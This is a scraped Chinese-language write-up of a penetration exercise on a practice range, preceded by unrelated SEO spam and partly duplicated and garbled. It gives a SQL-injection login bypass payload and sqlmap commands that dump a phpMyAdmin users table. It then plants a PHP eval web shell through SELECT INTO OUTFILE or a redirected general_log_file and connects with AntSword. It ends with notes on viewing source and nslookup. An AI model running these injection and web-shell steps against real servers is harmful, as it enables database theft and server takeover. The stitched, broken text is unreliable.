基于php技术的网站开发,哪位大神给个网址,那些做app网站的怎么寻找客户的,南宁公司做seo以下均为靶场测试环境渗透#xff0c;非正式环境。 遇见登录框#xff0c;直接万能密码’or(11)or’/1 直接登录成功并返回结果: 既然存在sql注入#xff0c;那就用sqlmap跑一下吧#xff1a; 输出所有的数据库#xff1a; sqlmap -u 目标URL --dbs 要输出数据库… 以下均为靶场测试环境渗透非正式环境。 遇见登录框直接万能密码’or(11)or’/1 直接登录成功并返回结果: 既然存在sql注入那就用sqlmap跑一下吧 输出所有的数据库 sqlmap -u 目标URL --dbs 要输出数据库中的表你可以使用 SQLMap 的 --tables 选项。以下是一个示例命令 sqlmap -u 目标URL -D 数据库名称 --tables 如果你想要进一步获取某个表的数据可以使用 --dump 选项。例如 sqlmap -u http://example.com/index.php?id1 -D exampledb -T users --dump 跑了一堆杂货于是我又去跑了目录发现有http://c63d6b5a18c915cb.node.nsctf.cn/phpmyadmin/index.php还以为上面的东西就是账号和密码白高兴一场。 最后这道题目我放了几天没管后来杰哥说他很快就跑出来了我又把这道题拿出来看然后还是不行他告诉我应该加个参数 python sqlmap.py -r 1.txt --risk 3 --batch --dbs python sqlmap.py -r 1.txt --risk 3 --batch -D phpmyadmin --tables python sqlmap.py -r 1.txt --risk 3 --batch -D phpmyadmin -T pma__users --dump 于是变成了这样子然后我抛出所有的库在库里面找到一个比较可疑的库然后跑所有的表找了一个可能包含用户名密码的表抛出里面的内容我发现确实很快那为什么之前一直那么慢呢我试了试其实和之前相比没有快多少之前的错误之处是因为我找到了一个库跑里面的所有库所以导致非常慢下次再跑这种东西的时候我就一个表一个表跑最后就跑出来账号和密码成功登录phpmyadmin服务器 注意到 可以在提权前阅读以下这篇好文 windows系统https://www.freebuf.com/column/173672.html linux系统https://www.cnblogs.com/liliyuanshangcao/p/13815242.html
先爆数据库安装路径
2、利用日志文件或备份文件来写入一句话 日志文件 1、开启日志 set global general_log “ON”; 2. 修改日志文件保存的位置 写入一句话木马 但是显示不行
从这里开始讲解我最后是咋做的来让我们一起来捋捋整个过程 首先网上说要获取网站根目录我哪里知道根目录啊各种报错探针都试了一遍遂放弃。有两种思路一种是写入一句话木马另一种是修改日志文件的位置然后通过select木马写入日志文件进行解析 我们必须提前检测一下“secure_file_priv”的值命令SHOW VARIABLES LIKE secure_file_priv; 可以看到值是多少secure_file_priv 有三种状态
secure_file_priv 为 NULL 时表示不允许导入导出
secure_file_priv 为 指定文件夹 时表示 mysql 的导入导出只能在指定的文件夹
secure_file_priv 没有设置时则表示没有任何限制而我此时只看到我执行的sql是第二种情况结果是/var/www/html/upload说明网站根目录极有可能在/var/www/html我就把我的木马文件写入到了它指定的文件夹下反正其他地方也写不了于是命令select ?php eval($_POST[shell]);? into outfile /var/www/html/upload/shell.php; 很幸运可以直接写入被解析直接上蚁剑连接 如果你没有像我这么幸运你可以尝试修改日志文件也就是当你面对让你插入文件的地方你插不了或者上面命令返回的是NULL的时候你可以再咬牙坚持以下 如果还不行 我们需要检测的是MySQL全局变量general_log、general_log file的值。 general log 指的是日志保存状态一共有两个值ON/OFFON代表开启 OFF代表关闭。 general log file 指的是日志的保存路径。
set global general_log ON;
SET global general_log_file网站根目录/infos.php;写入木马 select ‘?php eval($_POST[shell]);?’ ; 你可以尝试连接以下看看可不可以再不可以你可以先放弃。
最后 乘着空闲时间做了ctfshow的web入门题目做一个小总结 一查看源代码的方式 3. url前加入view-source: 查看源代码。 view-source:url 4. crtlu 也可以查看源代码 5. PHPS文件泄露phps文件就是php的源代码文件通常用于提供给用户访问者直接通过Web浏览器查看php代码的内容。因为用户无法直接通 过Web浏览器“看到”php文件的内容所以需要用phps文件代替。用户访问phps文件就能看到对应的php文件的源码。 6. 查询域名解析地址 基本格式nslookup host [server]查询域名的指定解析类型的解析记录 基本格式nslookup -typetype host [server]查询全部 基本格式nslookup -queryany host [server]